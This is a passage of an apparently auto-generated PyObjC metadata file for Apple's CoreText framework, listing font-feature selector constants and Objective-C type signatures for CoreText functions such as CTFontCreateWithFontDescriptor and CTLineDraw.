alNumbersSelector@1$kProportionalTextSelector@0$kQuarterWidthNumbersSelector@3$kQuarterWidthTextSelector@4$kRareLigaturesOffSelector@5$kRareLigaturesOnSelector@4$kRebusPicturesOffSelector@9$kRebusPicturesOnSelector@8$kRequiredLigaturesOffSelector@1$kRequiredLigaturesOnSelector@0$kRomanNumeralAnnotationSelector@7$kRomanizationToHiraganaSelector@5$kRomanizationToKatakanaSelector@6$kRoundedBoxAnnotationSelector@2$kRubyKanaOffSelector@3$kRubyKanaOnSelector@2$kRubyKanaSelector@1$kRubyKanaType@28$kSFNTLookupSegmentArray@4$kSFNTLookupSegmentSingle@2$kSFNTLookupSimpleArray@0$kSFNTLookupSingleTable@6$kSFNTLookupTrimmedArray@8$kSFNTLookupVector@10$kSTClassDeletedGlyph@2$kSTClassEndOfLine@3$kSTClassEndOfText@0$kSTClassOutOfBounds@1$kSTKCrossStreamReset@8192$kSTLigActionMask@16383$kSTMarkEnd@8192$kSTNoAdvance@16384$kSTRearrVerbMask@15$kSTSetMark@32768$kSTXHasLigAction@8192$kScientificInferiorsSelector@4$kShowDiacriticsSelector@0$kSimplifiedCharactersSelector@1$kSlashToDivideOffSelector@5$kSlashToDivideOnSelector@4$kSlashedZeroOffSelector@5$kSlashedZeroOnSelector@4$kSmallCapsSelector@3$kSmartQuotesOffSelector@9$kSmartQuotesOnSelector@8$kSmartSwashType@8$kSquaredLigaturesOffSelector@13$kSquaredLigaturesOnSelector@12$kStyleOptionsType@19$kStylisticAltEightOffSelector@17$kStylisticAltEightOnSelector@16$kStylisticAltEighteenOffSelector@37$kStylisticAltEighteenOnSelector@36$kStylisticAltElevenOffSelector@23$kStylisticAltElevenOnSelector@22$kStylisticAltFifteenOffSelector@31$kStylisticAltFifteenOnSelector@30$kStylisticAltFiveOffSelector@11$kStylisticAltFiveOnSelector@10$kStylisticAltFourOffSelector@9$kStylisticAltFourOnSelector@8$kStylisticAltFourteenOffSelector@29$kStylisticAltFourteenOnSelector@28$kStylisticAltNineOffSelector@19$kStylisticAltNineOnSelector@18$kStylisticAltNineteenOffSelector@39$kStylisticAltNineteenOnSelector@38$kStylisticAltOneOffSelector@3$kStylisticAltOneOnSelector@2$kStylisticAltSevenOffSelector@15$kStylisticAltSevenOnSelector@14$kStylisticAltSeventeenOffSelector@35$kStylisticAltSeventeenOnSelector@34$kStylisticAltSixOffSelector@13$kStylisticAltSixOnSelector@12$kStylisticAltSixteenOffSelector@33$kStylisticAltSixteenOnSelector@32$kStylisticAltTenOffSelector@21$kStylisticAltTenOnSelector@20$kStylisticAltThirteenOffSelector@27$kStylisticAltThirteenOnSelector@26$kStylisticAltThreeOffSelector@7$kStylisticAltThreeOnSelector@6$kStylisticAltTwelveOffSelector@25$kStylisticAltTwelveOnSelector@24$kStylisticAltTwentyOffSelector@41$kStylisticAltTwentyOnSelector@40$kStylisticAltTwoOffSelector@5$kStylisticAltTwoOnSelector@4$kStylisticAlternativesType@35$kSubstituteVerticalFormsOffSelector@1$kSubstituteVerticalFormsOnSelector@0$kSuperiorsSelector@1$kSwashAlternatesOffSelector@3$kSwashAlternatesOnSelector@2$kSymbolLigaturesOffSelector@17$kSymbolLigaturesOnSelector@16$kTRAKCurrentVersion@65536$kTRAKTag@1953653099$kTRAKUniformFormat@0$kTallCapsSelector@5$kTextSpacingType@22$kThirdWidthNumbersSelector@2$kThirdWidthTextSelector@3$kTitlingCapsSelector@4$kTraditionalAltFiveSelector@9$kTraditionalAltFourSelector@8$kTraditionalAltOneSelector@5$kTraditionalAltThreeSelector@7$kTraditionalAltTwoSelector@6$kTraditionalCharactersSelector@0$kTraditionalNamesCharactersSelector@14$kTranscodingCompositionOffSelector@5$kTranscodingCompositionOnSelector@4$kTransliterationType@23$kTypographicExtrasType@14$kUnconnectedSelector@0$kUnicodeDecompositionType@27$kUpperAndLowerCaseSelector@0$kUpperCaseNumbersSelector@1$kUpperCasePetiteCapsSelector@2$kUpperCaseSmallCapsSelector@1$kUpperCaseType@38$kVerticalFractionsSelector@1$kVer
ticalPositionType@10$kVerticalSubstitutionType@4$kWordFinalSwashesOffSelector@3$kWordFinalSwashesOnSelector@2$kWordInitialSwashesOffSelector@1$kWordInitialSwashesOnSelector@0$nameFontTableTag@1851878757$nonGlyphID@65535$os2FontTableTag@1330851634$sizeof_sfntCMapEncoding@8$sizeof_sfntCMapExtendedSubHeader@12$sizeof_sfntCMapHeader@4$sizeof_sfntCMapSubHeader@6$sizeof_sfntDescriptorHeader@8$sizeof_sfntDirectory@12$sizeof_sfntInstance@4$sizeof_sfntNameHeader@6$sizeof_sfntNameRecord@12$sizeof_sfntVariationAxis@20$sizeof_sfntVariationHeader@16$variationFontTableTag@1719034226$''' misc.update({}) functions={'CTFontManagerCreateFontDescriptorsFromURL': (b'^{__CFArray=}^{__CFURL=}', '', {'retval': {'already_cfretained': True}}), 'CTLineCreateTruncatedLine': (b'^{__CTLine=}^{__CTLine=}dI^{__CTLine=}', '', {'retval': {'already_cfretained': True}}), 'CTLineEnumerateCaretOffsets': (b'v^{__CTLine=}@?', '', {'retval': {'type': 'v'}, 'arguments': {1: {'callable': {'retval': {'type': b'v'}, 'arguments': {0: {'type': '^v'}, 1: {'type': 'd'}, 2: {'type': 'L'}, 3: {'type': 'B'}, 4: {'type': 'o^B'}}}, 'block': {'retval': {'type': b'v'}, 'arguments': {0: {'type': b'd'}, 1: {'type': b'q'}, 2: {'type': b'B'}, 3: {'type': b'^B'}}}}}}), 'CTFramesetterCreateFrame': (sel32or64(b'^{__CTFrame=}^{__CTFramesetter=}{_CFRange=ll}^{CGPath=}^{__CFDictionary=}', b'^{__CTFrame=}^{__CTFramesetter=}{_CFRange=qq}^{CGPath=}^{__CFDictionary=}'), '', {'retval': {'already_cfretained': True}}), 'CTTypesetterSuggestClusterBreak': (sel32or64(b'l^{__CTTypesetter=}ld', b'q^{__CTTypesetter=}qd'),), 'CTFontCreateCopyWithFamily': (sel32or64(b'^{__CTFont=}^{__CTFont=}f^{CGAffineTransform=ffffff}^{__CFString=}', b'^{__CTFont=}^{__CTFont=}d^{CGAffineTransform=dddddd}^{__CFString=}'), '', {'retval': {'already_cfretained': True}}), 'CTFontGetGlyphsForCharacters': (sel32or64(b'B^{__CTFont=}^T^Sl', b'B^{__CTFont=}^T^Sq'), '', {'arguments': {1: {'c_array_length_in_arg': 3, 'type_modifier': 'n'}, 2: {'c_array_length_in_arg': 3, 'type_modifier': 'o'}}}), 'CTLineGetPenOffsetForFlush': (sel32or64(b'd^{__CTLine=}fd', b'd^{__CTLine=}dd'),), 'CTTypesetterSuggestLineBreak': (sel32or64(b'l^{__CTTypesetter=}ld', b'q^{__CTTypesetter=}qd'),), 'CTFontCreateWithGraphicsFont': (sel32or64(b'^{__CTFont=}^{CGFont=}f^{CGAffineTransform=ffffff}^{__CTFontDescriptor=}', b'^{__CTFont=}^{CGFont=}d^{CGAffineTransform=dddddd}^{__CTFontDescriptor=}'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTRunGetStringRange': (sel32or64(b'{_CFRange=ll}^{__CTRun=}', b'{_CFRange=qq}^{__CTRun=}'),), 'CTFontCreateWithQuickdrawInstance': (sel32or64(b'^{__CTFont=}*sCf', b'^{__CTFont=}*sCd'), '', {'retval': {'already_cfretained': True}}), 'CTFontManagerUnregisterFontsForURL': (b'B^{__CFURL=}I^^{__CFError=}', '', {'arguments': {2: {'already_cfretained': True, 'type_modifier': 'o', 'null_accepted': True}}}), 'CTFontManagerCreateFontRequestRunLoopSource': (sel32or64(b'^{__CFRunLoopSource=}l@?', b'^{__CFRunLoopSource=}q@?'), '', {'retval': {'already_cfretained': True}, 'arguments': {1: {'callable': {'retval': {'type': b'@'}, 'arguments': {0: {'type': '^v'}, 1: {'type': '@'}, 2: {'type': 'i'}}}}}}), 'CTFontManagerRequestFonts': (b'v^{__CFArray=}@?', '', {'arguments': {1: {'block': {'retval': {'type': b'v'}, 'arguments': {0: {'type': b'^{__CFArray=}'}}}}}}), 'CTRubyAnnotationCreateWithAttributes': (b'@LLL@@', '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorMatchFontDescriptorsWithProgressHandler': (b'B^{__CFArray=}^{__CFSet=}@?',), 
'CTGlyphInfoGetGlyph': (b'S^{__CTGlyphInfo=}',), 'CTFontManagerUnregisterFontURLs': (b'v^{__CFArray=}I@?', '', {'arguments': {2: {'callable': {'retval': {'type': b'B'}, 'arguments': {0: {'type': '^v'}, 1: {'type': '@'}, 2: {'type': 'B'}}}, 'block': {'retval': {'type': b'B'}, 'arguments': {0: {'type': b'^{__CFArray=}'}, 1: {'type': b'B'}}}}}}), 'CTFontManagerCreateFontDescriptorsFromData': (b'^{__CFArray=}^{__CFData=}', '', {'retval': {'already_cfretained': True}}), 'CTRunDelegateGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontManagerRegisterFontURLs': (b'v^{__CFArray=}IB@?', '', {'arguments': {3: {'callable': {'retval': {'type': b'B'}, 'arguments': {0: {'type': '^v'}, 1: {'type': '@'}, 2: {'type': 'B'}}}, 'block': {'retval': {'type': b'B'}, 'arguments': {0: {'type': b'^{__CFArray=}'}, 1: {'type': b'B'}}}}}}), 'CTFontCopyAvailableTables': (b'^{__CFArray=}^{__CTFont=}I', '', {'retval': {'already_cfretained': True}}), 'CTFontManagerCompareFontFamilyNames': (sel32or64(b'l^{__CFString=}^{__CFString=}^v', b'q^{__CFString=}^{__CFString=}^v'),), 'CTRubyAnnotationCreate': (sel32or64(b'^{__CTRubyAnnotation=}CCf[4^{__CFString=}]', b'^{__CTRubyAnnotation=}CCd[4^{__CFString=}]'), '', {'retval': {'already_cfretained': True}, 'arguments': {3: {'type_modifier': 'n'}}}), 'CTRunGetStringIndicesPtr': (sel32or64(b'r^i^{__CTRun=}', b'r^q^{__CTRun=}'), '', {'retval': {'c_array_of_variable_length': True}}), 'CTFontGetAscent': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFontManagerRegisterGraphicsFont': (b'B^{CGFont=}^^{__CFError=}', '', {'arguments': {1: {'already_cfretained': True, 'type_modifier': 'o', 'null_accepted': True}}}), 'CTFontCollectionCopyQueryDescriptors': (b'^{__CFArray=}^{__CTFontCollection=}', '', {'retval': {'already_cfretained': True}}), 'CTTypesetterCreateLine': (sel32or64(b'^{__CTLine=}^{__CTTypesetter=}{_CFRange=ll}', b'^{__CTLine=}^{__CTTypesetter=}{_CFRange=qq}'), '', {'retval': {'already_cfretained': True}}), 'CTFontManagerRegisterFontDescriptors': (b'v^{__CFArray=}IB@?', '', {'arguments': {3: {'callable': {'retval': {'type': b'B'}, 'arguments': {0: {'type': '^v'}, 1: {'type': '@'}, 2: {'type': 'B'}}}, 'block': {'retval': {'type': b'B'}, 'arguments': {0: {'type': b'^{__CFArray=}'}, 1: {'type': b'B'}}}}}}), 'CTFontGetDescent': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFontCreateWithFontDescriptor': (sel32or64(b'^{__CTFont=}^{__CTFontDescriptor=}f^{CGAffineTransform=ffffff}', b'^{__CTFont=}^{__CTFontDescriptor=}d^{CGAffineTransform=dddddd}'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTRunGetAttributes': (b'^{__CFDictionary=}^{__CTRun=}',), 'CTFontCopySupportedLanguages': (b'^{__CFArray=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyVariationAxes': (b'^{__CFArray=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTTextTabGetLocation': (b'd^{__CTTextTab=}',), 'CTFontCopyPostScriptName': (b'^{__CFString=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyDefaultCascadeListForLanguages': (b'^{__CFArray=}^{__CTFont=}^{__CFArray=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetVerticalTranslationsForGlyphs': (sel32or64(b'v^{__CTFont=}^S^{_NSSize=ff}l', b'v^{__CTFont=}^S^{CGSize=dd}q'), '', {'arguments': {1: {'c_array_length_in_arg': 3, 'type_modifier': 'n'}, 2: {'c_array_length_in_arg': 3, 'type_modifier': 'o'}}}), 'CTFontGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontCollectionCreateMatchingFontDescriptorsWithOptions': 
(b'^{__CFArray=}^{__CTFontCollection=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTFramesetterCreateWithAttributedString': (b'^{__CTFramesetter=}^{__CFAttributedString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCreatePathForGlyph': (sel32or64(b'^{CGPath=}^{__CTFont=}S^{CGAffineTransform=ffffff}', b'^{CGPath=}^{__CTFont=}S^{CGAffineTransform=dddddd}'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTFrameDraw': (b'v^{__CTFrame=}^{CGContext=}',), 'CTFontCollectionCopyExclusionDescriptors': (b'^{__CFArray=}^{__CTFontCollection=}', '', {'retval': {'already_cfretained': True}}), 'CTRunGetBaseAdvancesAndOrigins': (b'v^{__CTRun=}{_CFRange=qq}^{CGSize=dd}^{CGPoint=dd}', '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}, 3: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTFontManagerGetAutoActivationSetting': (b'I^{__CFString=}',), 'CTFontGetOpticalBoundsForGlyphs': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTFont=}^S^{_NSRect={_NSPoint=ff}{_NSSize=ff}}lL', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTFont=}^S^{CGRect={CGPoint=dd}{CGSize=dd}}qQ'), '', {'arguments': {1: {'c_array_length_in_arg': 3, 'type_modifier': 'n'}, 2: {'c_array_length_in_arg': 3, 'type_modifier': 'o'}}}), 'CTFontManagerUnregisterFontDescriptors': (b'v^{__CFArray=}I@?', '', {'arguments': {2: {'callable': {'retval': {'type': b'B'}, 'arguments': {0: {'type': '^v'}, 1: {'type': '@'}, 2: {'type': 'B'}}}, 'block': {'retval': {'type': b'B'}, 'arguments': {0: {'type': b'^{__CFArray=}'}, 1: {'type': b'B'}}}}}}), 'CTFontDescriptorCopyAttribute': (b'@^{__CTFontDescriptor=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCreateWithFontDescriptorAndOptions': (sel32or64(b'^{__CTFont=}^{__CTFontDescriptor=}f^{CGAffineTransform=ffffff}L', b'^{__CTFont=}^{__CTFontDescriptor=}d^{CGAffineTransform=dddddd}Q'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTFontGetMatrix': (sel32or64(b'{CGAffineTransform=ffffff}^{__CTFont=}', b'{CGAffineTransform=dddddd}^{__CTFont=}'),), 'CTFontGetSymbolicTraits': (b'I^{__CTFont=}',), 'CTFontCreateCopyWithAttributes': (sel32or64(b'^{__CTFont=}^{__CTFont=}f^{CGAffineTransform=ffffff}^{__CTFontDescriptor=}', b'^{__CTFont=}^{__CTFont=}d^{CGAffineTransform=dddddd}^{__CTFontDescriptor=}'), '', {'retval': {'already_cfretained': True}}), 'CTRubyAnnotationGetSizeFactor': (sel32or64(b'f^{__CTRubyAnnotation=}', b'd^{__CTRubyAnnotation=}'),), 'CTFontCollectionCopyFontAttribute': (b'^{__CFArray=}^{__CTFontCollection=}^{__CFString=}I', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyFamilyName': (b'^{__CFString=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTGlyphInfoGetTypeID': (sel32or64(b'L', b'Q'),), 'CTParagraphStyleCreate': (sel32or64(b'^{__CTParagraphStyle=}^{CTParagraphStyleSetting=II^v}L', b'^{__CTParagraphStyle=}^{CTParagraphStyleSetting=IQ^v}Q'), '', {'retval': {'already_cfretained': True}, 'arguments': {0: {'c_array_length_in_arg': 1, 'type_modifier': 'n'}}}), 'CTRunGetImageBounds': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTRun=}^{CGContext=}{_CFRange=ll}', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTRun=}^{CGContext=}{_CFRange=qq}'),), 'CTFontManagerIsSupportedFont': (b'B^{__CFURL=}',), 'CTRunGetAdvancesPtr': (sel32or64(b'^{CGSize=ff}^{__CTRun=}', b'^{CGSize=dd}^{__CTRun=}'), '', {'retval': {'c_array_of_variable_length': True}}), 'CTRunGetStatus': (b'I^{__CTRun=}',), 
'CTGlyphInfoGetCharacterIdentifier': (b'S^{__CTGlyphInfo=}',), 'CTFontGetUnitsPerEm': (b'I^{__CTFont=}',), 'CTFontCopyVariation': (b'^{__CFDictionary=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFrameGetFrameAttributes': (b'^{__CFDictionary=}^{__CTFrame=}',), 'CTFramesetterCreateWithTypesetter': (b'@@', '', {'retval': {'already_cfretained': True}}), 'CTTextTabCreate': (b'^{__CTTextTab=}Cd^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCollectionSetExclusionDescriptors': (b'v^{__CTFontCollection=}^{__CFArray=}',), 'CTFrameGetPath': (b'^{CGPath=}^{__CTFrame=}',), 'CTFontManagerCopyRegisteredFontDescriptors': (b'^{__CFArray=}IB', '', {'retval': {'already_cfretained': True}}), 'CTFrameGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFramesetterGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontCollectionCreateFromAvailableFonts': (b'^{__CTFontCollection=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTRunGetGlyphsPtr': (b'r^S^{__CTRun=}', '', {'retval': {'c_array_of_variable_length': True}}), 'CTFontDrawGlyphs': (sel32or64(b'v^{__CTFont=}^S^{CGPoint=ff}L^{CGContext=}', b'v^{__CTFont=}^S^{CGPoint=dd}Q^{CGContext=}'), '', {'arguments': {1: {'c_array_length_in_arg': 3, 'type_modifier': 'n'}, 2: {'c_array_length_in_arg': 3, 'type_modifier': 'n'}}}), 'CTFontGetGlyphCount': (sel32or64(b'l^{__CTFont=}', b'q^{__CTFont=}'),), 'CTFontManagerCreateFontDescriptorFromData': (b'^{__CTFontDescriptor=}^{__CFData=}', '', {'retval': {'already_cfretained': True}}), 'CTGlyphInfoGetCharacterCollection': (b'S^{__CTGlyphInfo=}',), 'CTFontCopyAttribute': (b'@^{__CTFont=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetBoundingRectsForGlyphs': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTFont=}I^S^{_NSRect={_NSPoint=ff}{_NSSize=ff}}l', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTFont=}I^S^{CGRect={CGPoint=dd}{CGSize=dd}}q'), '', {'arguments': {2: {'c_array_length_in_arg': 4, 'type_modifier': 'n'}, 3: {'c_array_length_in_arg': 4, 'type_modifier': 'o'}}}), 'CTFontGetBoundingBox': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTFont=}', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTFont=}'),), 'CTFontManagerSetAutoActivationSetting': (b'v^{__CFString=}I',), 'CTTypesetterCreateWithAttributedStringAndOptions': (b'^{__CTTypesetter=}^{__CFAttributedString=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTLineGetImageBounds': (sel32or64(b'{CGRect={CGPoint=ff}{CGSize=ff}}^{__CTLine=}^{CGContext=}', b'{CGRect={CGPoint=dd}{CGSize=dd}}^{__CTLine=}^{CGContext=}'),), 'CTFontCopyDisplayName': (b'^{__CFString=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTGetCoreTextVersion': (b'I',), 'CTParagraphStyleCreateCopy': (b'^{__CTParagraphStyle=}^{__CTParagraphStyle=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetAdvancesForGlyphs': (sel32or64(b'd^{__CTFont=}I^S^{_NSSize=ff}l', b'd^{__CTFont=}I^S^{CGSize=dd}q'), '', {'arguments': {2: {'c_array_length_in_arg': 4, 'type_modifier': 'n'}, 3: {'c_array_length_in_arg': 4, 'type_modifier': 'o'}}}), 'CTTextTabGetOptions': (b'^{__CFDictionary=}^{__CTTextTab=}',), 'CTGlyphInfoCreateWithGlyph': (b'^{__CTGlyphInfo=}S^{__CTFont=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCreateWithPlatformFont': (sel32or64(b'^{__CTFont=}Lf^{CGAffineTransform=ffffff}^{__CTFontDescriptor=}', b'^{__CTFont=}Id^{CGAffineTransform=dddddd}^{__CTFontDescriptor=}'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 
'CTFontCreateForStringWithLanguage': (b'^{__CTFont=}^{__CTFont=}^{__CFString=}{_CFRange=qq}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontManagerUnregisterGraphicsFont': (b'B^{CGFont=}^^{__CFError=}', '', {'arguments': {1: {'already_cfretained': True, 'type_modifier': 'o', 'null_accepted': True}}}), 'CTRubyAnnotationCreateCopy': (b'^{__CTRubyAnnotation=}^{__CTRubyAnnotation=}', '', {'retval': {'already_cfretained': True}}), 'CTTypesetterSuggestClusterBreakWithOffset': (sel32or64(b'l^{__CTTypesetter=}ldd', b'q^{__CTTypesetter=}qdd'),), 'CTRunGetTypeID': (sel32or64(b'L', b'Q'),), 'CTRubyAnnotationGetTextForPosition': (b'^{__CFString=}^{__CTRubyAnnotation=}C',), 'CTLineGetTypographicBounds': (sel32or64(b'd^{__CTLine=}^f^f^f', b'd^{__CTLine=}^d^d^d'), '', {'arguments': {1: {'type_modifier': 'o'}, 2: {'type_modifier': 'o'}, 3: {'type_modifier': 'o'}}}), 'CTFontGetPlatformFont': (sel32or64(b'L^{__CTFont=}^^{__CTFontDescriptor}', b'I^{__CTFont=}^^{__CTFontDescriptor}'), '', {'arguments': {1: {'already_cfretained': True, 'type_modifier': 'o'}}}), 'CTLineGetTrailingWhitespaceWidth': (b'd^{__CTLine=}',), 'CTFontManagerRegisterFontsForURL': (b'B^{__CFURL=}I^^{__CFError=}', '', {'arguments': {2: {'already_cfretained': True, 'type_modifier': 'o', 'null_accepted': True}}}), 'CTFontCopyTable': (sel32or64(b'^{__CFData=}^{__CTFont=}LI', b'^{__CFData=}^{__CTFont=}II'), '', {'retval': {'already_cfretained': True}}), 'CTTypesetterSuggestLineBreakWithOffset': (sel32or64(b'l^{__CTTypesetter=}ldd', b'q^{__CTTypesetter=}qdd'),), 'CTGlyphInfoCreateWithCharacterIdentifier': (b'^{__CTGlyphInfo=}SS^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyCharacterSet': (b'^{__CFCharacterSet=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetStringEncoding': (sel32or64(b'L^{__CTFont=}', b'I^{__CTFont=}'),), 'CTRunGetStringIndices': (sel32or64(b'v^{__CTRun=}{_CFRange=ll}^l', b'v^{__CTRun=}{_CFRange=qq}^q'), '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTRunGetAdvances': (sel32or64(b'v^{__CTRun=}{_CFRange=ll}^{_NSSize=ff}', b'v^{__CTRun=}{_CFRange=qq}^{CGSize=dd}'), '', {'arguments': {2: {'c_array_length_in_arg': 1, 'type_modifier': 'o'}}}), 'CTFontCollectionCreateMatchingFontDescriptorsSortedWithCallback': (b'^{__CFArray=}^{__CTFontCollection=}^?@', '', {'retval': {'already_cfretained': True}, 'arguments': {1: {'callable': {'retval': {'type': b'i'}, 'arguments': {0: {'type': b'^{__CTFontDescriptor=}'}, 1: {'type': b'^{__CTFontDescriptor=}'}, 2: {'type': b'@'}}}, 'callable_retained': False}}}), 'CTFontCopyFullName': (b'^{__CFString=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTParagraphStyleGetValueForSpecifier': (sel32or64(b'B^{__CTParagraphStyle=}IL^v', b'B^{__CTParagraphStyle=}IQ^v'), '', {'arguments': {3: {'c_array_length_in_arg': 2, 'type_modifier': 'o'}}}), 'CTLineGetOffsetForStringIndex': (sel32or64(b'f^{__CTLine=}l^f', b'd^{__CTLine=}q^d'), '', {'arguments': {2: {'type_modifier': 'o'}}}), 'CTFontManagerEnableFontDescriptors': (b'v^{__CFArray=}B',), 'CTRubyAnnotationGetAlignment': (b'C^{__CTRubyAnnotation=}',), 'CTFontCopyLocalizedName': (b'^{__CFString=}^{__CTFont=}^{__CFString=}^^{__CFString}', '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'o'}}}), 'CTFontDescriptorCreateCopyWithFamily': (b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFString=}', '', {'retval': {'already_cfretained': True}}), 'CTFontManagerGetScopeForURL': (b'I^{__CFURL=}',), 'CTFontGetSize': 
(sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFontCollectionGetTypeID': (sel32or64(b'L', b'Q'),), 'CTFontGetGlyphWithName': (b'S^{__CTFont=}^{__CFString=}',), 'CTLineGetGlyphRuns': (b'^{__CFArray=}^{__CTLine=}',), 'CTFontCreateWithNameAndOptions': (sel32or64(b'^{__CTFont=}^{__CFString=}f^{CGAffineTransform=ffffff}L', b'^{__CTFont=}^{__CFString=}d^{CGAffineTransform=dddddd}Q'), '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'n'}}}), 'CTFontDescriptorCreateCopyWithAttributes': (b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyFontDescriptor': (b'^{__CTFontDescriptor=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontGetCapHeight': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFontGetUnderlineThickness': (sel32or64(b'f^{__CTFont=}', b'd^{__CTFont=}'),), 'CTFontManagerCopyAvailableFontURLs': (b'^{__CFArray=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCopyFeatureSettings': (b'^{__CFArray=}^{__CTFont=}', '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorCreateMatchingFontDescriptor': (b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFSet=}', '', {'retval': {'already_cfretained': True}}), 'CTLineGetGlyphCount': (sel32or64(b'l^{__CTLine=}', b'q^{__CTLine=}'),), 'CTLineDraw': (b'v^{__CTLine=}^{CGContext=}',), 'CTFontDescriptorCreateCopyWithFeature': (b'^{__CTFontDescriptor=}^{__CTFontDescriptor=}^{__CFNumber=}^{__CFNumber=}', '', {'retval': {'already_cfretained': True}}), 'CTRubyAnnotationGetTypeID': (sel32or64(b'L', b'Q'),), 'CTTypesetterGetTypeID': (sel32or64(b'L', b'Q'),), 'CTRunGetTextMatrix': (sel32or64(b'{CGAffineTransform=ffffff}^{__CTRun=}', b'{CGAffineTransform=dddddd}^{__CTRun=}'),), 'CTFontGetLigatureCaretPositions': (sel32or64(b'l^{__CTFont=}S^fl', b'q^{__CTFont=}S^dq'), '', {'arguments': {2: {'c_array_length_in_arg': 3, 'type_modifier': 'o'}}}), 'CTFontCollectionCreateMutableCopy': (b'^{__CTFontCollection=}^{__CTFontCollection=}', '', {'retval': {'already_cfretained': True}}), 'CTFontDescriptorCreateWithNameAndSize': (sel32or64(b'^{__CTFontDescriptor=}^{__CFString=}f', b'^{__CTFontDescriptor=}^{__CFString=}d'), '', {'retval': {'already_cfretained': True}}), 'CTLineGetStringRange': (sel32or64(b'{_CFRange=ll}^{__CTLine=}', b'{_CFRange=qq}^{__CTLine=}'),), 'CTFontManagerCopyAvailablePostScriptNames': (b'^{__CFArray=}', '', {'retval': {'already_cfretained': True}}), 'CTRunDelegateGetRefCon': (b'^v^{__CTRunDelegate=}',), 'CTLineCreateJustifiedLine': (sel32or64(b'^{__CTLine=}^{__CTLine=}fd', b'^{__CTLine=}^{__CTLine=}dd'), '', {'retval': {'already_cfretained': True}}), 'CTFrameGetLines': (b'^{__CFArray=}^{__CTFrame=}',), 'CTFontCollectionCreateCopyWithFontDescriptors': (b'^{__CTFontCollection=}^{__CTFontCollection=}^{__CFArray=}^{__CFDictionary=}', '', {'retval': {'already_cfretained': True}}), 'CTRunGetGlyphCount': (sel32or64(b'l^{__CTRun=}', b'q^{__CTRun=}'),), 'CTFontDescriptorCreateMatchingFontDescriptors': (b'^{__CFArray=}^{__CTFontDescriptor=}^{__CFSet=}', '', {'retval': {'already_cfretained': True}}), 'CTFontCollectionSetQueryDescriptors': (b'v^{__CTFontCollection=}^{__CFArray=}',), 'CTFontDescriptorCopyLocalizedAttribute': (b'@^{__CTFontDescriptor=}^{__CFString=}^^{__CFString}', '', {'retval': {'already_cfretained': True}, 'arguments': {2: {'type_modifier': 'o'}}}), 'CTFrameGetStringRange': (sel32or64(b'{_CFRange=ll}^{__CTFrame=}', b'{_CFRange=qq}^{__CTFrame=}'),), 'CTFrameGetLineOrigins': 
